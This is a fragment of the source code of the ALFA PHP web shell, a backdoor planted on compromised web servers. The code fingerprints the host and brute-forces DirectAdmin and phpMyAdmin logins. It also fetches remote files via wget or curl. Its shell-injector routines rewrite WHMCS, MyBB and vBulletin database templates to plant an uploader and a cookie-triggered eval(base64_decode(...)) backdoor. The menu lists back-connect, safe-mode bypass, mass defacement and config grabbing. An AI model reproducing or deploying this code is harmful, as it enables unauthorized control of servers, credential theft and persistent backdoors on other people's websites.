class='editor-file-name'>"+editor_files[t].file+"</div>",editor_files[t].type=e});if("file"==a){a=(a=e.split("."))[a.length-1].toLowerCase();-1==["json","ppt","pptx","xls","xlsx","msi","config","cgi","pm","c","cpp","cs","java","aspx","asp","db","ttf","eot","woff","woff2","woff","conf","log","apk","cab","bz2","tgz","dmg","izo","jar","7z","iso","rar","bat","sh","alfa","gz","tar","php","php4","php5","phtml","html","xhtml","shtml","htm","zip","png","jpg","jpeg","gif","bmp","ico","txt","js","rb","py","xml","css","sql","htaccess","pl","ini","dll","exe","mp3","mp4","m4a","mov","flv","swf","mkv","avi","wmv","mpg","mpeg","dat","pdf","3gp","doc","docx","docm"].indexOf(a)&&(a="notfound")}else a="folder";return'<img src="http://solevisible.com/icons/{type}" width="30" height="30">'.replace("{type}",a+".png")}function updateFileEditor(e,a){var t="id_"+e,i="id_chmode_"+e,l="id_rename_"+e,o="id_touch_"+e,r="id_edit_"+e,n="id_download_"+e,d="id_delete_"+e,s=$(t).getAttribute("ftype");"folder"==s&&(s="dir"),"file"==s?($(t).innerHTML=a,$(t).setAttribute("href","#action=fileman&path="+c_+"/"+a),$(t).setAttribute("onclick","editor('"+a+"','auto','','','','file')"),$(r).setAttribute("onclick","editor('"+a+"','edit','','','','"+s+"')"),$(n).setAttribute("onclick","g('FilesTools',null,'"+a+"', 'download')")):($(t).innerHTML="<b>| "+a+" |</b>",$(t).setAttribute("onclick","g('FilesMan', '"+c_+"/"+a+"')")),$(i).setAttribute("onclick","editor('"+a+"','chmod','','','','"+s+"')"),$(l).setAttribute("onclick","editor('"+a+"','rename','','','','"+s+"')"),$(o).setAttribute("onclick","editor('"+a+"','touch','','','','"+s+"')"),$(d).setAttribute("onclick","var chk = confirm('Are You Sure For Delete # "+a+" # ?'); chk ? g('FilesMan',null,'delete', '"+a+"') : '';"),$(t).setAttribute("fname",a)}function updateDirsEditor(e,a){var t=d.mf.c.value+"/",i=editor_files[e].pwd+"/"+a+"/",l=editor_files[e].pwd+"/"+editor_files[e].file+"/";for(var o in i=i.replace(/\/\//g,"/"),l=l.replace(/\/\//g,"/"),-1!=(t=t.replace(/\/\//g,"/")).search(i)&&(initDir(t.replace(i,l)),d.mf.c.value=t.replace(i,l)),editor_files){var r=editor_files[o].pwd+"/";-1!=(r=r.replace(/\/\//g,"/")).search(i)&&(editor_files[o].pwd=r.replace(i,l))}updateCookieEditor()}function updateCookieEditor(){setCookie("alfa_history_files",btoa(JSON.stringify(editor_files)),2012)}function setEditorTitle(e,a){if("out"==a&&""!=editor_current_file){var t=d.querySelector(".editor-tab-name.editor-tab-active");e=null!=t?t.getAttribute("opt_id").replace("editor_source_","file_"):editor_current_file}editor_files[e]&&(d.getElementsByClassName("editor-path")[0].innerHTML=(editor_files[e].pwd+"/"+editor_files[e].file).replace(/\/\//g,"/"))}function removeHistory(e){delete editor_files[e],$(e)&&$(e).parentNode.parentNode.removeChild($(e).parentNode);var a=d.getElementsByClassName("filestools")[0];a&&a.getAttribute("fid")==e&&(a.outerHTML=""),editor_current_file==e&&(editor_current_file=""),updateCookieEditor()}function getRandom(e){for(var a="",t="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ",i=void 0===e?20:e;i>0;--i)a+=t[Math.floor(Math.random()*t.length)];return a}function reopen(e){var a=e.getAttribute("id"),t=editor_files[a].pwd,i=editor_files[a].file,l="editor_source_"+a.replace("file_","");null==$(l)?editor(i,"auto","",t,a):editorTabController(l,!0)}function copyToClipboard(e){e=e.getAttribute("ace_id");var a=alfa_ace_editors.editor[e].selection.toJSON();alfa_ace_editors.editor[e].selectAll(),alfa_ace_editors.editor[e].focus(),document.execCommand("copy"),alfa_ace_editors.editor[e].selection.fromJSON(a),alfaShowNotification("text copied","Editor")}function encrypt(e,a){if(null==a||a.length<=0)return null;e=alfab64(e,!0),a=alfab64(a,!0);for(var t="",i="",l=0;l<e.length;)for(var o=0;o<a.length&&(t=e.charCodeAt(l)^a.charCodeAt(o),i+=String.fromCharCode(t),!(++l>=e.length));o++);return alfab64(i,!0)}function reloadSetting(e){return alfaloader(alfa_before_do_action_id,"block"),_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(e.protect.value)+"&alfa2="+alfab64(e.lgpage.value)+"&alfa3="+alfab64(e.username.value)+"&alfa4="+alfab64(e.password.value)+"&alfa5="+alfab64(">>")+"&alfa6="+alfab64(e.icon.value)+"&alfa7="+alfab64(e.post_encrypt.value)+"&alfa8="+alfab64("main")+"&alfa9="+alfab64(e.cgi_api.value)+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(e,a){loadPopUpOpTions(a,e),evalJS(e),alfaloader(a,"none")},!1,alfa_before_do_action_id),alfa_before_do_action_id="",0==e.e.value&&1==e.protect.value&&setTimeout("location.reload()",1e3),e.s.value!=e.icon.value&&setTimeout("location.reload()",1e3),!1}function reloadColors(e){var a={};void 0===e?d.querySelectorAll(".colors_input").forEach(function(e){var t=e.getAttribute("target").replace(".","");a[t]=e.value}):a=e;var t=$("use_default_color").checked?"1":"0";_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(JSON.stringify(a))+"&alfa2="+alfab64(">>")+"&alfa3="+alfab64(t)+"&alfa8="+alfab64("color")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(e){evalJS(e)},!0)}function alfab64(e,a){return void 0!==a||0==post_encryption_mode?window.btoa(unescape(encodeURIComponent(e))):encrypt(e,"<?php echo __ALFA_SECRET_KEY__; ?>")}function evalCss(e){var a=document.createElement("style");a.styleSheet?a.styleSheet.cssText=e:a.appendChild(document.createTextNode(e)),d.getElementsByTagName("head")[0].appendChild(a)}function colorHandlerKey(e){setTimeout(function(a){colorHandler(e)},200)}function colorHandler(e){var a=e.getAttribute("target"),t=e.getAttribute("multi"),l=a.indexOf(":hover");if(t){var o=JSON.parse(atob(t)),r="";for(i in o.multi_selector)r+=i+"{"+o.multi_selector[i].replace(/{color}/g,e.value)+"}";evalCss(r)}-1==l||t?($("input_"+a.replace(".","")).value=e.value,$("gui_"+a.replace(".","")).value=e.value,".header_values"==a&&(a=".header,.header_values"),d.querySelectorAll(a).forEach(function(a){a.style.color=e.value})):($("input_"+a.replace(".","")).value=e.value,$("gui_"+a.replace(".","")).value=e.value,evalCss(a+"{color: "+e.value+";}"))}function importConfig(e){var a=e.target,t=new FileReader;t.onload=function(){var e=t.result;try{reloadColors(JSON.parse(e))}catch(e){alert("Config is invalid...!")}$("importFileBtn").value=""},t.readAsText(a.files[0])}function checkBox(e){var a=alfa_current_fm_id,t=e.checked;d.querySelectorAll("#filesman_holder_"+a+" form[name=files] input[type=checkbox]").forEach(function(e){e.checked=t})}function runcgi(e){if($("cgiframe").style.height="unset",d.querySelector("#cgiloader-minimized .minimized-text").innerHTML="Cgi Shell",d.querySelector("#cgiloader .opt-title").innerHTML="Cgi Shell",cgi_is_minimized&&cgi_lang==e&&(showEditor("cgiloader"),0==php_temrinal_using_cgi))return!1;php_temrinal_using_cgi=!1,_Ajax(d.URL,"a="+alfab64("cgishell")+"&alfa1="+alfab64(e)+"&ajax="+alfab64("true"),function(a){d.body.style.overflow="hidden",$("cgiloader").style.display="block",d.querySelector("#cgiframe .terminal-tabs").innerHTML="",d.querySelector("#cgiframe .terminal-contents").innerHTML=a,cgi_lang=e,cgi_is_minimized&&($("cgiloader-minimized").setAttribute("class","minimized-hide"),setTimeout(function(){$("cgiloader").removeAttribute("class"),is_minimized&&($("editor-minimized").style.top="30%")},1e3))})}Element.prototype.appendAfter=function(e){e.parentNode.insertBefore(this,e.nextSibling)};
</script>
<?php echo"<form style='display:none;' id='dlForm' action='' target='_blank' method='post'>
<input type='hidden' name='a' value='dlfile'>
<input type='hidden' name='c' value=''>
<input type='hidden' name='file' value=''>
</form>
<input type='file' style='display:none;' id='importFileBtn' onchange='importConfig(event);'>
<div id='a_loader'><img src='".__showicon('loader')."'></div>";
$cmd_uname = alfaEx("uname -a",false,false);
$uname = function_exists('php_uname') ? substr(@php_uname(), 0, 120) : (strlen($cmd_uname)>0?$cmd_uname:'( php_uname ) Function Disabled !');
if($uname=="( php_uname ) Function Disabled !"){$GLOBALS["need_to_update_header"]="true";}
echo '
</head>
<body bgcolor="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<div id="up_bar_holder"></div>
<div class="whole">
<form method="post" name="mf" style="display:none;">
<input type="hidden" name="a">
<input type="hidden" name="c" value="'.$GLOBALS['cwd'].'">';
for($s=1;$s<=10;$s++){
echo '<input type="hidden" name="alfa'.$s.'">';
}
echo '<input type="hidden" name="charset">
</form>
<div id=\'hidden_sh\'><span style="color:#42ff59;">'.__ALFA_CODE_NAME__.'</span><br><small>Version: <span class="hidden_shell_version">'.__ALFA_VERSION__.'</span></small></div>
<div class="header"><table width="100%" border="0">
<tr>
<td width="3%"><span class="header_vars">Uname:</span></td>
<td colspan="2"><span class="header_values" id="header_uname">'.$uname.'</span></td>
</tr>
<tr>
<td><span class="header_vars">User:</span></td>
<td><span class="header_values" id="header_userid">'. $uid . ' [ ' . $user . ' ] </span><span class="header_vars"> Group: </span><span class="header_values" id="header_groupid">' . $gid . ' [ ' . $group . ' ]</span> </td>
</tr>
<tr>
<td><span class="header_vars">PHP:</span></td>
<td><b>'.@phpversion(). ' </b><span class="header_vars"> Safe Mode: '.$safe_modes.'</span></td>
</tr>
<tr>
<td><span class="header_vars">ServerIP:</span></td>
<td><b>'.(!@$_SERVER["SERVER_ADDR"]?(function_exists("gethostbyname")?@gethostbyname($_SERVER['SERVER_NAME']):'????'):@$_SERVER["SERVER_ADDR"]).'</b><div style="display:inline;display:none;" class="flag-holder"></div> <span class="header_vars">Your IP:</span><b> '.@$_SERVER["REMOTE_ADDR"].'</b><div style="display:inline;display:none;" class="flag-holder"></div></td>
</tr>
<tr>
<td><span class="header_vars">Domains:</span></td>
<td width="76%"><span class="header_values" id="header_domains">';
if($GLOBALS['sys']=='unix'){
$d0mains = _alfa_file("/etc/named.conf",false);
if(!$d0mains){echo "Cant Read [ /etc/named.conf ]";$GLOBALS["need_to_update_header"]="true";}else{
$count=0;
foreach($d0mains as $d0main){
if(@strstr($d0main,"zone")){
preg_match_all('#zone "(.*)"#', $d0main, $domains);
flush();
if(strlen(trim($domains[1][0])) > 2){
flush();
$count++;}}}
echo "$count Domains";}}
else{echo("Cant Read [ /etc/named.conf ]");}
echo '</span></td>
</tr>
<tr>
<td height="16"><span class="header_vars">HDD:</span></td>
<td><span class="header_vars">Total:</span><b>'.alfaSize($totalSpace).' </b><span class="header_vars">Free:</span><b>' . alfaSize($freeSpace) . ' ['. (int) ($freeSpace/$totalSpace*100) . '%]</b></td>
</tr>';
if($GLOBALS['sys']=='unix'){
$sx_dwlr = '<tr><td height="18" colspan="2"><span class="header_vars">useful:</span><span class="header_values" id="header_useful">--------------</span></td></tr><td height="0" colspan="2"><span class="header_vars">Downloader: </span><span class="header_values" id="header_downloader">--------------</span></td></tr>';
if(!@ini_get('safe_mode')){
if(strlen(alfaEx("id",false,false))>0){
echo '<tr><td height="18" colspan="2"><span class="header_vars">Useful : </span>';
$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzialfa2','nc','locate','suidperl');
$x=0;
foreach($userful as $item)if(alfaWhich($item)){$x++;echo '<span class="header_values" style="margin-left: 4px;">'.$item.'</span>';}
if($x==0){echo "<span class='header_values' id='header_useful'>--------------</span>";$GLOBALS["need_to_update_header"] = "true";}
$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
$x=0;
foreach($downloaders as $item2)if(alfaWhich($item2)){$x++;echo '<span class="header_values" style="margin-left: 4px;">'.$item2.'</span>';}
if($x==0){echo "<span class='header_values' id='header_downloader'>--------------</span>";$GLOBALS["need_to_update_header"] = "true";}
echo '</td>
</tr>';
}else{
echo $sx_dwlr;$GLOBALS["need_to_update_header"] = "true";
}
}else{
echo $sx_dwlr;$GLOBALS["need_to_update_header"] = "true";
}
}else{
echo '<tr><td height="18" colspan="2"><span class="header_vars">Windows:</span><b>';
echo alfaEx('ver',false,false);
echo '</td>
</tr> <tr>
<td height="0" colspan="2"><span class="header_vars">Downloader: </span><b>-------------</b></td>
</tr></b>';
}
$quotes = (function_exists('get_magic_quotes_gpc')?get_magic_quotes_gpc():'0');if ($quotes == "1" or $quotes== "on"){$magic = '<b><span class="header_on">ON</span>';}else{$magic = '<span class="header_off">OFF</span>';}
echo '<tr>
<td height="16" colspan="2"><span class="header_vars">Disable Functions: </span><b>'.Alfa_GetDisable_Function().'</b></td>
</tr>
<tr>
<td height="16" colspan="2"><span class="header_vars">CURL :</span>'.$curl.' | <span class="header_vars">SSH2 : </span>'.$ssh2.' | <span class="header_vars">Magic Quotes : </span>'.$magic.' | <span class="header_vars"> MySQL :</span>'.$mysql.' | <span class="header_vars">MSSQL :</span>'.$mssql.' | <span class="header_vars"> PostgreSQL :</span>'.$pg.' | <span class="header_vars"> Oracle :</span>'.$or.' '.($GLOBALS['sys']=="unix"?'| <span class="header_vars"> CGI :</span> '.$cgi_shell:"").'</td>
</tr>
<tr>
<td height="11" colspan="3"><span class="header_vars">Open_basedir :</span><b>'.$open_b.'</b> | <span class="header_vars">Safe_mode_exec_dir :</span><b>'.$safe_exe.'</b> | <span class="header_vars"> Safe_mode_include_dir :</span></b>'.$safe_include.'</b></td>
</tr>';
if($GLOBALS['sys']=="win"){
echo '<tr>
<td height="12"><span class="header_vars">DRIVE:</span></td>
<td colspan="2"><b>'.$drives.'</b></td>
</tr>';
}
echo '<tr>
<td height="12"><span class="header_vars">DIR :</span></td>
<td colspan="2"><span id="header_cwd">'.$cwd_links.' </span><a href="#action=fileman&path='.$GLOBALS['home_cwd'].'" onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')"><span class="home_shell">[ Home Shell ]</span> </a></td>
</tr>
</table>
</div>
<div id="meunlist">
<ul>
';
$li = array('proc'=>'Proc','phpeval'=>'Eval','sql'=>'SQL','connect'=>'BC','safe'=>'Bypass','cgishell'=>'Cgi','cpcrack'=>'Hash','basedir'=>'BaseDir','pwchanger'=>'Addmin','ShellInjectors'=>'Inject','symlink'=>'Symlink','MassDefacer'=>'Mass','searcher'=>'Search','config_grabber'=>'Config','inbackdoor'=>'Inject','selfrm'=>'killme'
);
foreach($li as $key=>$value){
echo('<li><a id="menu_opt_'.$key.'" href="#action=options&path='.$GLOBALS['cwd'].'&opt='.$key.'" class="menu_options" onclick="alfa_can_add_opt=true;this.href=\'#action=options&path=\'+c_+\'&opt='.$key.'\';g(\''.$key.'\',null,\'\',\'\',\'\');d.querySelector(\'.opt-title\').innerHTML=this.innerHTML;">'.$value.'</a></li>');
}
echo (!empty($_COOKIE['AlfaUser']) && !empty($_COOKIE['AlfaPass']) ? '<a href="javascript:void(0);" onclick="alfaLogOut();"><font color="red">LogOut</font></a>':'').'</ul></div></div><div id="filesman_tabs"><div onmouseover="alfaFilesmanTabShowTitle(this,event);" onmouseout="alfaFilesmanTabHideTitle(this,event);" fm_counter="1" path="'.$GLOBALS['cwd'].'" fm_id="1" id="filesman_tab_1" class="filesman_tab filesman-tab-active" onclick="filesmanTabController(this);"><img class="folder-tab-icon" src="http://solevisible.com/icons/menu/folder2.svg"> <span>File manager</span></div><div style="display:inline-block;" id="filesman_tabs_child"></div><div id="filesman_new_tab" class="filesman_tab" style="background: maroon;" onClick="alfaFilesManNewTab(c_,\'/\',1);">New Tab +</div></div>';}else{
@error_reporting(E_ALL ^ E_NOTICE);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('magic_quotes_runtime', 0);
@set_time_limit(0);
}}
function alfalogout(){
@setcookie("AlfaUser", null, 2012);
@setcookie("AlfaPass", null, 2012);
unset($_COOKIE['AlfaUser'],$_COOKIE['AlfaPass']);
echo("ok");
}
function showAnimation($name){
return '-webkit-animation: '.$name.' 800ms ease-in-out forwards;-moz-animation: '.$name.' 800ms ease-in-out forwards;-ms-animation: '.$name.' 800ms ease-in-out forwards;animation: '.$name.' 800ms ease-in-out forwards;';
}
function __showicon($r){
$s['btn']='http://solevisible.com/images/btn.png';
$s['alfamini']='http://solevisible.com/images/alfamini.png';
$s['loader']='http://solevisible.com/images/loader.svg';
return $s[$r];
}
function __download($url,$path=false){
if(!preg_match("/[a-z]+:\/\/.+/",$url)) return false;
$saveas = basename(rawurldecode($url));
if($path){$saveas=$path.$saveas;}
if($content = __read_file($url)){
if(@is_file($saveas))@unlink($saveas);
if(__write_file($saveas, $content)){return true;}}
$buff = alfaEx("wget ".$url." -O ".$saveas);
if(@is_file($saveas)) return true;
$buff = alfaEx("curl ".$url." -o ".$saveas);
if(@is_file($saveas)) return true;
$buff = alfaEx("lwp-download ".$url." ".$saveas);
if(@is_file($saveas)) return true;
$buff = alfaEx("lynx -source ".$url." > ".$saveas);
if(@is_file($saveas)) return true;
$buff = alfaEx("GET ".$url." > ".$saveas);
if(@is_file($saveas)) return true;
$buff = alfaEx("links -source ".$url." > ".$saveas);
if(@is_file($saveas)) return true;
$buff = alfaEx("fetch -o ".$saveas." -p ".$url);
if(@is_file($saveas)) return true;
return false;
}
function clean_string($string){
  if(function_exists("iconv")){
  $s = trim($string);
  $s = iconv("UTF-8", "UTF-8//IGNORE", $s);
  }
  return $s;
}
function __read_file($file, $boom = true){
$content = false;
if($fh = @fopen($file, "rb")){
$content = "";
while(!feof($fh)){
$content .= $boom ? clean_string(fread($fh, 8192)) : fread($fh, 8192);
}
@fclose($fh);
}
if(empty($content)||!$content){
$content = alfaEx("cat '".addslashes($file)."'");
}
return $content;
}
function Alfa_DirectAdmin_Cracker($info){
if(!$info['mysql'])
$url = $info['protocol'].$info['target'].':'.$info['port'].'/CMD_LOGIN';
else $url = $info['protocol'].$info['target'].'/phpmyadmin';
$curl = curl_init();
curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);
curl_setopt($curl, CURLOPT_HEADER,0);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_URL,$url);
curl_setopt($curl, CURLOPT_USERPWD, $info['username'].':'.$info['password']);
if($info['mysql'])curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_ANY);
$result = @curl_exec($curl);
$curl_errno = curl_errno($curl);
$curl_error = curl_error($curl);
if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
elseif(preg_match('/CMD_FILE_MANAGER|frameset/i',$result)){
echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green">  Login Success....</font><br>';
$info['target'] = $url;
CrackerResualt($info);
}
curl_close($curl);
}
function alfaShellInjectors(){
alfahead();
echo '<div class=header>';
AlfaNum(11);
echo '<center><p><div class="txtfont_header">| Cms Shell Injector |</div></p><center><h3><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,\'whmcs\',null)">| WHMCS | </a><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,null,\'mybb\')">| MyBB | </a><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,null,null,\'vb\')">| vBulletin |</a></h3></center>';
$selector = '<p><div class="txtfont">Shell Inject Method : </div> <select name="method" style="width:100px;"><option value="auto">AutoMatic</option><option value="man">Manuel</option></select></p>';
if(isset($_POST['alfa1']) && $_POST['alfa1']== 'whmcs'){
AlfaNum();
echo __pre()."<p><div class='txtfont_header'>| WHMCS |</div></p><center><center><p>".getConfigHtml('whmcs')."</p><form onSubmit=\"g('ShellInjectors',null,'whmcs',null,null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.path.value); return false;\" method='post'>";
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Path WHMCS Url : ', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host : ', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Name : ', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db User : ', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue'=> '', 'inputSize' => '50'),
 'td5' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass : ', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
);
create_table($table);
echo $selector;
echo "<p><input type='submit' value='>>'></p></form></center></td></tr></table></center>";
if(isset($_POST['alfa6'])) {
$dbu = $_POST['alfa6'];
$dbn = $_POST['alfa7'];
$dbp = $_POST['alfa8'];
$dbh = $_POST['alfa9'];
$path = $_POST['alfa10'];
$method = $_POST['alfa4'];
$index = "{php}".ALFA_UPLOADER.";{/php}";
$newin = str_replace("'","\'",$index);
$newindex = "<p>Dear $newin,</p><p>Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.</p><p>To reset your password, please visit the url below:<br /><a href=\"{\$pw_reset_url}\">{\$pw_reset_url}</a></p><p>When you visit the link above, your password will be reset, and the new password will be emailed to you.</p><p>{\$signature}</p>{php}if(\$_COOKIE[\"sec\"] == \"123\"){eval(base64_decode(\$_COOKIE[\"sec2\"])); die(\"!\");}{\/php}";
if(!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)){
if(filter_var($path,FILTER_VALIDATE_URL)){
$conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_connect_error());
$soleSave= mysqli_query($conn,"select message from tblemailtemplates where name='Password Reset Validation'");
$soleGet = mysqli_fetch_assoc($soleSave);
$tempSave1 = $soleGet['message'];
$tempSave = str_replace("'","\'",$tempSave1);
mysqli_query($conn,"UPDATE tblconfiguration SET value = '1' WHERE setting = 'AllowSmartyPhpTags'") or die (mysqli_error($conn));
$inject = "UPDATE tblemailtemplates SET message='$newindex' WHERE name='Password Reset Validation'";
$result = mysqli_query($conn,$inject) or die (mysqli_error($conn));
$create = "insert into tblclients (email) values('solevisible@fbi.gov')";
$result2 = mysqli_query($conn,$create) or die (mysqli_error($conn));
if(function_exists('curl_version') && $method == 'auto'){
$AlfaSole = new AlfaCURL(true);
$saveurl = $AlfaSole->Send($path."/pwreset.php");
$getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i",$saveurl,$token);
$AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov");
$backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
$Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));
__alert("shell injectet...");
$ff= 'http://'.$path."/solevisible.php";
output($ff);}else{
echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target => </font><a href='".$path."/pwreset.php' target='_blank'>".$path."/pwreset.php</a><br/><font color='#FFFFFF'> And Reset Password With Email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color='#FFFFFF'>And Go To => </font><a href='".$path."/solevisible.php' target='_blank'>".$path."/solevisible.php</a></b></center><br><br>";}}else{__alert('Path is not Valid...');}}}
}if(isset($_POST['alfa2']) && $_POST['alfa2']== 'mybb'){
AlfaNum(1,2,3,5);
echo __pre()."<p><div class='txtfont_header'>| MyBB |</div></p><center><center>".getConfigHtml("mybb")."<form id='sendajax' onSubmit=\"g('ShellInjectors',null,null,'mybb',null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.prefix.value); return false;\" method=POST>
";
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'dbh', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'dbn', 'id'=>'db_name' ,'inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'dbu', 'id'=>'db_user', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'dbp', 'id'=>'db_pw', 'inputValue' => '', 'inputSize' => '50'),
 'td5' =>
 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'prefix', 'id'=>'db_prefix','inputValue' => 'mybb_', 'inputSize' => '50')
);
create_table($table);
echo $selector;
echo "<p><input type=submit value=' '></p></form></center></center>";
if(isset($_POST['alfa6'])) {
$dbu = $_POST['alfa6'];
$dbn = $_POST['alfa7'];
$dbp = $_POST['alfa8'];
$dbh = $_POST['alfa9'];
$prefix = $_POST['alfa10'];
$method = $_POST['alfa4'];
$shellCode = "{\${".ALFA_UPLOADER."}}";
$newinshell = str_replace("'","\'",$shellCode);
if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($newinshell)){
$conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
$inject = "select template from {$prefix}templates where  title= 'calendar'";
$result = mysqli_query($conn, $inject) or die (mysqli_error($conn));
$GetTemp = mysqli_fetch_assoc($result);
$saveDate = $GetTemp['template'];
$repsave = str_replace($shellCode,"",$saveDate);
$repsave = str_replace("'","\'",$repsave);
$createShell = "update {$prefix}templates SET template= '".$newinshell.$repsave."' where title = 'calendar'";
$result2 = mysqli_query($conn,$createShell) or die (mysqli_error($conn));
$geturl = "select value from {$prefix}settings where name= 'bburl'";
$findurl = mysqli_query($conn,$geturl) or die (mysqli_error($conn));
$rowb = mysqli_fetch_assoc($findurl);
$furl = $rowb['value'];
$realurl = parse_url($furl,PHP_URL_HOST);
$realpath = parse_url($furl,PHP_URL_PATH);
$res = false;
$AlfaCurl = new AlfaCURL();
if (extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto' ){
if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){
@fputs($fsock, "GET $realpath/calendar.php HTTP/1.1\r\n");
@fputs($fsock, "HOST: $realurl\r\n");
@fputs($fsock, "Connection: close\r\n\r\n");
$check = fgets($fsock);
if(preg_match("/200 OK/i",$check)){
$repairdbtemp = "update {$prefix}templates SET template= '$repsave' where title = 'calendar'";
$clear = mysqli_query($conn,$repairdbtemp) or die (mysqli_error($conn));$res = true;}
@fclose($fsock);}}elseif(function_exists('curl_version') && $method == 'auto'){
$AlfaCurl->Send($realurl.$realpath."/calendar.php");
$res = true;
}
if($res){
$ff = 'http://'.$realurl.$realpath."/solevisible.php";
output($ff);
}else{
$ff = 'http://'.$realurl.$realpath."/calendar.php";
$fff = 'http://'.$realurl.$realpath."/solevisible.php";
echo "<br><pre id='strOutput' style='margin-top:5px' class='ml1'><br><center><b><font color='#FFFFFF'>Please Go To Target => </font><a href='".$ff."' target='_blank'>".$ff."</a><br/><font color='#FFFFFF'>And Go To => </font><a href='".$fff."' target='_blank'>".$fff."</a></b></center><br><br>";
}}}}
if(isset($_POST['alfa3']) && $_POST['alfa3']== 'vb'){
AlfaNum(1,2,7,9,10);
echo __pre().'<p><div class="txtfont_header">| vbulletin |</div></p><p>'.getConfigHtml('vb').'</p><form name="frm" method="POST" onsubmit="g(\'ShellInjectors\',null,null,this.lo.value,\'vb\',this.user.value,this.pass.value,this.tab.value,this.db.value,this.method.value); return false;">';
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'lo', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'db', 'id'=>'db_name','inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'user', 'id'=>'db_user','inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'pass', 'id'=>'db_pw','inputValue' => '', 'inputSize' => '50'),
 'td5' =>
 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'tab', 'id'=>'db_prefix','inputValue' => '', 'inputSize' => '50')
);
create_table($table);
echo $selector;
echo '<p><input type="submit" value=" " /></p></form></center>';
if(isset($_POST['alfa4'])&&!empty($_POST['alfa4'])){
$method = $_POST['alfa8'];
$faq_name = "faq";
$faq_file = "/faq.php";
$code = "{\${".ALFA_UPLOADER."}}{\${exit()}}&";
$conn=@mysqli_connect($_POST['alfa2'],$_POST['alfa4'],$_POST['alfa5'],$_POST['alfa7']) or die(@mysqli_connect_error());
$rec = "select `template` from ".$_POST['alfa6']."template WHERE title ='".$faq_name."'";
$recivedata = @mysqli_query($conn,$rec);
$getd = @mysqli_fetch_assoc($recivedata);
$savetoass = $getd['template'];
if(empty($savetoass)){
$faq_name = "header";
$faq_file = "/";
$rec = "select `template` from ".$_POST['alfa6']."template WHERE title ='".$faq_name."'";
$recivedata = @mysqli_query($conn,$rec);
$getd = @mysqli_fetch_assoc($recivedata);
$savetoass = $getd['template'];
$code = ALFA_UPLOADER.";";
}
$code = str_replace("'","\'",$code);
